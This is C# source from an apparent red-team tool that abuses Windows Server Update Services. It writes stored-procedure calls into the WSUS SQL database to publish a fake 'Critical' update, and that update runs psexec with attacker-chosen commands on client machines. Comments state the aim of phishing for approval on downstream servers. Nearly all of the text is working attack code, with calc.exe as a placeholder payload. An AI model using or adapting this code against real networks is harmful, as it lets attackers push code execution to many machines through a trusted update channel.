static bool FbPrepareXMLtoClient(SqlCommand sqlCommFun, ClFile clFileData)
{
SqlDataReader sqldrReader;
StringBuilder sbXMLClient = new StringBuilder();
sbXMLClient.AppendLine(@"exec spSaveXmlFragment '" + clGuidData.gUpdate + @"',202,1,N'<UpdateIdentity UpdateID=""" + clGuidData.gUpdate + @""" RevisionNumber=""202"" /><Properties UpdateType=""Software"" /><Relationships></Relationships><ApplicabilityRules><IsInstalled><False /></IsInstalled><IsInstallable><True /></IsInstallable></ApplicabilityRules>',NULL");
sbXMLClient.AppendLine(@"exec spSaveXmlFragment '" + clGuidData.gUpdate + @"',202,4,N'<LocalizedProperties><Language>en</Language><Title>Probably-legal-update</Title></LocalizedProperties>',NULL,'en'");
sbXMLClient.AppendLine(@"exec spSaveXmlFragment '" + clGuidData.gUpdate + @"',202,2,N'<ExtendedProperties DefaultPropertiesLanguage=""en"" Handler=""http://schemas.microsoft.com/msus/2002/12/UpdateHandlers/CommandLineInstallation"" MaxDownloadSize=""" + clFileData.lSize + @""" MinDownloadSize=""" + clFileData.lSize + @"""><InstallationBehavior RebootBehavior=""NeverReboots"" /></ExtendedProperties><Files><File Digest=""" + clFileData.sSHA1 + @""" DigestAlgorithm=""SHA1"" FileName=""" + clFileData.sFileName + @""" Size=""" + clFileData.lSize + @""" Modified=""2010-11-25T15:26:20.723""><AdditionalDigest Algorithm=""SHA256"">" + clFileData.sSHA256 + @"</AdditionalDigest></File></Files><HandlerSpecificData type=""cmd:CommandLineInstallation""><InstallCommand Arguments=""" + clFileData.sArgs + @""" Program=""" + clFileData.sFileName + @""" RebootByDefault=""false"" DefaultResult=""Failed""><ReturnCode Reboot=""false"" Result=""Succeeded"" Code=""0"" /></InstallCommand></HandlerSpecificData>',NULL");
sqlCommFun.CommandText = sbXMLClient.ToString();
try
{
if (clCLI.bVerbose == true)
{
Console.WriteLine("PrepareXMLtoClient");
}
sqldrReader = sqlCommFun.ExecuteReader();
sqldrReader.Close();
return(true);
}
catch
{
Console.WriteLine("\r\nFunction error - FbPrepareXMLtoClient.");
return(false);
}
}
static bool FbInjectUrl2Download(SqlCommand sqlCommFun, ClFile clFileData)
{
SqlDataReader sqldrReader;
StringBuilder sbDownloadURL = new StringBuilder();
string sDownloadURLexec = string.Empty;
if (clWSUSData.bSSL == true)
{
sDownloadURLexec = @"https://" + clWSUSData.sComputerName + ":" + clWSUSData.iPortNumber + "/Content/wuagent.exe";
}
else if (clWSUSData.bSSL == false)
{
sDownloadURLexec = @"http://" + clWSUSData.sComputerName + ":" + clWSUSData.iPortNumber + "/Content/wuagent.exe";
}
else
{
return(false);
}
sbDownloadURL.AppendLine(@"exec spSetBatchURL @urlBatch =N'<ROOT><item FileDigest=""" + clFileData.sSHA1 + @""" MUURL=""" + sDownloadURLexec + @""" USSURL="""" /></ROOT>'");
sqlCommFun.CommandText = sbDownloadURL.ToString();
try
{
if (clCLI.bVerbose == true)
{
Console.WriteLine("InjectURL2Download");
}
sqldrReader = sqlCommFun.ExecuteReader();
sqldrReader.Close();
return(true);
}
catch
{
Console.WriteLine("\r\nFunction error - FbInjectUrl2Download.");
return(false);
}
}
static void Main(string[] args)
{
try
{
if (!clCLI.FbCLIInterface(args))
{
return;
}
if (clWSUSData.bWSUSInstalled == false)
{
Console.WriteLine("While checking registry it appears WSUS is not installed, stopping execution.");
return;
}
SqlCommand sqlComm = new SqlCommand();
sqlComm.Connection = FsqlConnection();
if (sqlComm.Connection != null)
{
if (clCLI.bEnumComps == true)
{
FbEnumAllComputers(sqlComm);
}
if (clCLI.bEnumDS == true)
{
//Enum DS Servers
}
if (clCLI.bDeleteUpdate == true)
{
if (FbDeleteUpdate(sqlComm, clCLI.sBundleGUID) == false)
{
return;
}
}
if (clCLI.bTargetComputer == true || clCLI.bManualApproval == true)
{
/////
//ClFile(filename, local filepath, arguments, copy file to WSUS\Content?, WSUS Content Path)
//Todo - Dynamically detect WSUS content path, it's in registry
ClFile clFileData = new ClFile("psexec.exe", @"c:\temp\psexec.exe", @"-d -accepteula cmd.exe /c ""c:\windows\system32\calc.exe""", @"C:\program files\update services\WsusContent", true);
/////
/////
//If you're going to use single quotes in title, description, or anywhere below, use two or it won't work correctly
//For example, we''re going phishing.
/////
stUpdateData.sTitle = "Windows Super Awesome Critical Update for Super Fun Times (KB1234567)";
stUpdateData.sReleaseDate = @"2018-10-08T17:00:00.000Z";
stUpdateData.sClassification = "Critical";
stUpdateData.sMSRCNumber = "MS18-123";
stUpdateData.sKBNumbers = "1234567";
stUpdateData.sDescription = "This update will patch super awesome versions of Windows. We''re phishing for an auto-approval or manual approval on the downstream WSUS servers";
//stUpdateData.sProducts = "Windows XP, 2003, 7, 2008(R2), 2012, 10, 2016";
stUpdateData.sURL = @"https://ijustwannared.team";
/////
if (!FbGetWSUSConfigSQL(sqlComm))
{
return;
}
if (!FbImportUpdate(sqlComm, clFileData))
{
return;
}
if (!FbPrepareXMLtoClient(sqlComm, clFileData))
{
return;
}
if (!FbInjectUrl2Download(sqlComm, clFileData))
{
return;
}
if (!FbDeploymentRevision(sqlComm, stUpdateData.iRevisionID))
{
return;
}
if (!FbPrepareBundle(sqlComm))
{
return;
}
if (!FbPrepareXmlBundleToClient(sqlComm))
{
return;
}
if (!FbDeploymentRevision(sqlComm, stUpdateData.iRevisionID))
{
return;
}
Console.WriteLine("To delete update run the following: Thunder_Woosus.exe -DeleteUpdate {0}", clGuidData.gBundle);
}
}
else
{
Console.WriteLine("\r\nSQL Command null");
}
sqlComm.Connection.Close();
}
catch
{
Console.WriteLine("\r\nFunction error - Main.");
}
}
static bool FbImportUpdate(SqlCommand sqlCommFun, ClFile clFileData)
{
System.Data.DataTable dtDataTbl = new System.Data.DataTable();
SqlDataReader sqldrReader;
StringBuilder sbUpdate = new StringBuilder();
sbUpdate.AppendLine(@"declare @iImported int");
sbUpdate.AppendLine(@"declare @iLocalRevisionID int");
sbUpdate.AppendLine(@"exec spImportUpdate @UpdateXml=N'");
sbUpdate.AppendLine(@"<upd:Update xmlns:b=""http://schemas.microsoft.com/msus/2002/12/LogicalApplicabilityRules"" xmlns:pub=""http://schemas.microsoft.com/msus/2002/12/Publishing"" xmlns:cbs=""http://schemas.microsoft.com/msus/2002/12/UpdateHandlers/Cbs"" xmlns:cbsar=""http://schemas.microsoft.com/msus/2002/12/CbsApplicabilityRules"" xmlns:upd=""http://schemas.microsoft.com/msus/2002/12/Update"">");
sbUpdate.AppendLine("\t" + @"<upd:UpdateIdentity UpdateID=""" + clGuidData.gUpdate + @""" RevisionNumber=""202"" />");
sbUpdate.AppendLine("\t" + @"<upd:Properties DefaultPropertiesLanguage=""en"" UpdateType=""Software"" Handler=""http://schemas.microsoft.com/msus/2002/12/UpdateHandlers/Cbs"" MaxDownloadSize=""" + clFileData.lSize + @""" MinDownloadSize=""" + clFileData.lSize + @""" PublicationState=""Published"" CreationDate=""2013-10-08T00:03:55.912Z"" PublisherID=""395392a0-19c0-48b7-a927-f7c15066d905"">");
sbUpdate.AppendLine("\t\t" + @"<upd:InstallationBehavior RebootBehavior=""CanRequestReboot"" />");
sbUpdate.AppendLine("\t\t" + @"<upd:UninstallationBehavior RebootBehavior=""CanRequestReboot"" />");
sbUpdate.AppendLine("\t" + @"</upd:Properties>");
sbUpdate.AppendLine("\t" + @"<upd:LocalizedPropertiesCollection>");
sbUpdate.AppendLine("\t\t" + @"<upd:LocalizedProperties>");
sbUpdate.AppendLine("\t\t\t" + @"<upd:Language>en</upd:Language>");
sbUpdate.AppendLine("\t\t\t" + @"<upd:Title>Probably-legal-update</upd:Title>");
sbUpdate.AppendLine("\t\t" + @"</upd:LocalizedProperties>");
sbUpdate.AppendLine("\t" + @"</upd:LocalizedPropertiesCollection>");
sbUpdate.AppendLine("\t" + @"<upd:ApplicabilityRules>");
sbUpdate.AppendLine("\t\t" + @"<upd:IsInstalled><b:False /></upd:IsInstalled>");
sbUpdate.AppendLine("\t\t" + @"<upd:IsInstallable><b:True /></upd:IsInstallable>");
sbUpdate.AppendLine("\t" + @"</upd:ApplicabilityRules>");
sbUpdate.AppendLine("\t" + @"<upd:Files>");
sbUpdate.AppendLine("\t\t" + @"<upd:File Digest=""" + clFileData.sSHA1 + @""" DigestAlgorithm=""SHA1"" FileName=""" + clFileData.sFileName + @""" Size=""" + clFileData.lSize + @""" Modified=""2018-10-01T15:26:20.723"">");
sbUpdate.AppendLine("\t\t\t" + @"<upd:AdditionalDigest Algorithm=""SHA256"">" + clFileData.sSHA256 + @"</upd:AdditionalDigest>");
sbUpdate.AppendLine("\t\t" + @"</upd:File>");
sbUpdate.AppendLine("\t" + @"</upd:Files>");
sbUpdate.AppendLine("\t" + @"<upd:HandlerSpecificData xsi:type=""cmd: CommandLineInstallation"" xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:pub=""http://schemas.microsoft.com/msus/2002/12/Publishing"">");
sbUpdate.AppendLine("\t\t" + @"<cmd:InstallCommand Arguments=""" + clFileData.sArgs + @""" Program=""" + clFileData.sFileName + @""" RebootByDefault=""false"" DefaultResult=""Failed"" xmlns:cmd=""http://schemas.microsoft.com/msus/2002/12/UpdateHandlers/CommandLineInstallation"">");
sbUpdate.AppendLine("\t\t\t" + @"<cmd:ReturnCode Reboot=""false"" Result=""Succeeded"" Code=""0"" />");
sbUpdate.AppendLine("\t\t" + @"</cmd:InstallCommand>");
sbUpdate.AppendLine("\t" + @"</upd:HandlerSpecificData>");
sbUpdate.AppendLine(@"</upd:Update>',");
sbUpdate.AppendLine(@"@UpstreamServerLocalID=1,@Imported=@iImported output,@localRevisionID=@iLocalRevisionID output,@UpdateXmlCompressed=NULL");
sbUpdate.AppendLine(@"select @iImported,@iLocalRevisionID");
sqlCommFun.CommandText = sbUpdate.ToString();
try
{
sqldrReader = sqlCommFun.ExecuteReader();
dtDataTbl.Load(sqldrReader);
stUpdateData.iRevisionID = (int)dtDataTbl.Rows[0][1];
if (stUpdateData.iRevisionID == 0)
{
Console.WriteLine("Error importing update");
sqldrReader.Close();
return(false);
}
if (clCLI.bVerbose == true)
{
Console.WriteLine("ImportUpdate");
Console.WriteLine("Update Revision ID: {0}", stUpdateData.iRevisionID);
}
sqldrReader.Close();
sqldrReader.Close();
return(true);
}
catch
{
Console.WriteLine("\r\nFunction error - FbImportUpdate.");
}
return(false);
}